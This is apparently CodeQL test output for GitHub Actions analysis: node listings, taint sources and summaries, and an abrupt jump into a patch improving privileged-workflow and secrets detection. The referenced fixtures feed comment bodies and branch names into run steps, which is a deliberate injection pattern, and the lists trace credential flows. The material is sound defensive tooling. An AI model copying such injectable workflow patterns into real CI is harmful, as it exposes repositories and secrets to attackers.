.github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | 
.github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | 
.github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| 
.github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -cfgNodes -| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| 
.github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:1:1:40:53 | enter on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| 
.github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -dfNodes -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | 
steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -argumentNodes -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -usesIds -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | -nodeLocations -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | 
.github/workflows/expression_nodes.yml@11:25:11:56 | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | 
.github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | -scopes -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| 
.github/workflows/test.yml:1:1:40:53 | on: push | -sources -| ahmadnassri/action-changed-files | * | output.files | PR changed files | -| ahmadnassri/action-changed-files | * | output.json | PR changed files | -| amannn/action-semantic-pull-request | * | output.error_message | PR title | -| cypress-io/github-action | * | env.GH_BRANCH | PR branch | -| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | -| dorny/paths-filter | * | output.changes | PR changed files | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | -| jitterbit/get-changed-files | * | output.added | PR changed files | -| jitterbit/get-changed-files | * | output.added_modified | PR changed files | -| jitterbit/get-changed-files | * | output.all | PR changed files | -| jitterbit/get-changed-files | * | output.deleted | PR changed files | -| jitterbit/get-changed-files | * | output.modified | PR changed files | -| jitterbit/get-changed-files | * | output.removed | PR changed files | -| jitterbit/get-changed-files | * | output.renamed | PR changed files | -| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | -| marocchino/on_artifact | * | output.* | Downloaded artifact | -| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | -| tj-actions/branch-names | * | output.current_branch | PR current branch | -| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | -| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | -| tj-actions/changed-files | * | output.added_files | PR changed files | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | -| tj-actions/changed-files | * | output.all_changed_files | PR changed files | -| 
tj-actions/changed-files | * | output.all_modified_files | PR changed files | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | -| tj-actions/changed-files | * | output.changed_keys | PR changed files | -| tj-actions/changed-files | * | output.copied_files | PR changed files | -| tj-actions/changed-files | * | output.deleted_files | PR changed files | -| tj-actions/changed-files | * | output.modified_files | PR changed files | -| tj-actions/changed-files | * | output.modified_keys | PR changed files | -| tj-actions/changed-files | * | output.other_changed_files | PR changed files | -| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | -| tj-actions/changed-files | * | output.other_modified_files | PR changed files | -| tj-actions/changed-files | * | output.renamed_files | PR changed files | -| tj-actions/changed-files | * | output.type_changed_files | PR changed files | -| tj-actions/changed-files | * | output.unknown_files | PR changed files | -| tj-actions/changed-files | * | output.unmerged_files | PR changed files | -| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | -| trilom/file-changes-action | * | output.files | PR changed files | -| trilom/file-changes-action | * | output.files_added | PR changed files | -| trilom/file-changes-action | * | output.files_modified | PR changed files | -| trilom/file-changes-action | * | output.files_removed | PR changed files | -| tzkhan/pr-update-action | * | output.headMatch | | -| xt0rted/slash-command-action | * | output.command-arguments | | -summaries -| akhileshns/heroku-deploy | * | input.branch | output.status | taint | -| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | -| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | -| ashley-taylor/read-json-property-action | * | input.json | output.value | 
taint | -| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | -| ashley-taylor/regex-property-action | * | input.value | output.value | taint | -| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | -| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | -| aszc/change-string-case-action | * | input.string | output.capitalized | taint | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | -| bobheadxi/deployments | * | input.env | output.env | taint | -| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | -| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | -| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | -| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | -| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | -| csexton/release-asset-action | * | input.release-url | output.url | taint | -| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | -| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | -| frabert/replace-string-action | * | input.string | output.replaced | taint | -| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | -| getsentry/action-release | * | 
input.version | output.version | taint | -| getsentry/action-release | * | input.version_prefix | output.version | taint | -| github/codeql-action | * | input.output | output.sarif-output | taint | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | -| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | -| haya14busa/action-cond | * | input.if_false | output.value | taint | -| haya14busa/action-cond | * | input.if_true | output.value | taint | -| hexlet/project-action | * | input.mount-path | env.PWD | taint | -| jsdaniell/create-json | * | input.dir | output.successfully | taint | -| jsdaniell/create-json | * | input.json | output.successfully | taint | -| jsdaniell/create-json | * | input.name | output.successfully | taint | -| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | -| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | -| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | -| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | -| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | -| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | -| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | -| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | -| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | -| octo-org/summary-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | -| octo-org/this-repo/.github/workflows/workflow.yml | * | input.config-path | output.workflow-output | taint | -| ruby/setup-ruby | * | 
input.ruby-version | output.ruby-prefix | taint | -| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | -| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | -| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | -| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | -| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | -| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | -calls -| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | -needs -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -testNormalizeExpr -| foo['bar'] == baz | foo.bar == baz | -| github.event.pull_request.user["login"] | github.event.pull_request.user.login | -| github.event.pull_request.user['login'] | github.event.pull_request.user.login | -| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | -writeToGitHubEnv -| id1 | $( Date: Thu, 11 Apr 2024 16:23:51 +0200 Subject: [PATCH 0168/1267] Improve privleged workflow detection --- ql/lib/codeql/actions/Ast.qll | 17 ++++++++++++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 23 +++++++++++++++++++ ql/src/Security/CWE-829/ArtifactPoisoning.ql | 2 +- .../CWE-094/.github/workflows/simple3.yml | 2 +- 4 files changed, 40 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cf5b63399f0..91ee95a90ab 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -20,7 +20,7 @@ module Utils { } bindingset[str] - string trimQuotes(string str) { + private string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } @@ -212,6 +212,13 @@ class Workflow extends AstNode instanceof WorkflowImpl { } predicate isPrivileged() { + // The Workflow has a permission to write to some scope + this.getPermissions().getAPermission() = "write" and + // The Workflow accesses a secret + exists(SecretsExpression expr | + expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + or // The Workflow is triggered by an event other than `pull_request` not this.hasSingleTrigger("pull_request") or @@ -248,7 +255,11 @@ class Outputs extends AstNode instanceof OutputsImpl { override string toString() { result = "Job outputs node" } } -class Permissions extends AstNode instanceof PermissionsImpl { } +class Permissions extends AstNode instanceof PermissionsImpl { + string getPermission(string perm) { result = super.getPermission(perm) } + + string getAPermission() { result = super.getAPermission() } +} class Strategy extends AstNode instanceof StrategyImpl { Expression getMatrixVarExpr(string varName) { result = super.getMatrixVarExpr(varName) } @@ -348,6 +359,8 @@ abstract class SimpleReferenceExpression extends AstNode instanceof SimpleRefere AstNode getTarget() { result = super.getTarget() } } +class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } + class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { string getStepId() { result = super.getStepId() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index bba5c1a47d3..300377536d6 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
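Review bot: The new first disjunct of `Workflow.isPrivileged()` joins the write-permission test and the secrets test with `and`, so it holds only when a workflow both declares a `write` permission and references a non-`GITHUB_TOKEN` secret. The two comments read as independent indicators, and either one alone already makes a `pull_request`-only workflow worth treating as privileged. If that is the intent, the first condition should end in `or`: `this.getPermissions().getAPermission() = "write" or`. Separately, a workflow with no `permissions:` block presumably yields no result from `getPermissions()`, yet its token can still be read-write under the repository default, so that case deserves its own disjunct or at least a comment. The predicate body continues past the end of the hunk.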
@@ -484,6 +484,10 @@ class PermissionsImpl extends AstNodeImpl, TPermissionsNode { override Location getLocation() { result = n.getLocation() } override YamlMapping getNode() { result = n } + + string getPermission(string perm) { result = n.lookup(perm).(YamlScalar).getValue() } + + string getAPermission() { result = this.getPermission(_) } } class StrategyImpl extends AstNodeImpl, TStrategyNode { @@ -851,6 +855,25 @@ private string inputsCtxRegex() { Utils::wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) } +private string secretsCtxRegex() { result = Utils::wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } + +/** + * Holds for an expression accesing the `secrets` context. + * e.g. `${{ secrets.FOO }}` + */ +class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { + string fieldName; + + SecretsExpressionImpl() { + Utils::normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and + fieldName = Utils::normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { none() } +} + /** * Holds for an expression accesing the `steps` context. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 6d3910e2ca5..19b007902bd 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -4,7 +4,7 @@ * @kind path-problem * @problem.severity warning * @precision high - * @security-severity 9.3 + * @security-severity 5.0 * @id actions/artifact-poisoning * @tags actions * security diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml index 